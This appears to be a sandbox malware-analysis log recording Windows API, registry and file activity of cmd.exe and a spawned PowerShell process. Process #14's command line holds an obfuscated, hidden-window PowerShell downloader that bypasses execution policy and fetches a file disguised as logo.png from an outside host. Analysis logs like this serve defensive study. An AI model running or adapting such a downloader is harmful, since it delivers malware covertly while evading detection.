Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
File	Get Info	filename = PowErshelL.eXe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x86c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #14: powershell.exe

467

0

»

Information	Value
ID	#14
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:00, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:25

OS Process Information

»

Information	Value
PID	0x86c
Parent PID	0x538 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 870 0x 8B0 0x 90C 0x 740 0x 440 0x 74C 0x BBC

Threads

Thread 0x870

420

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
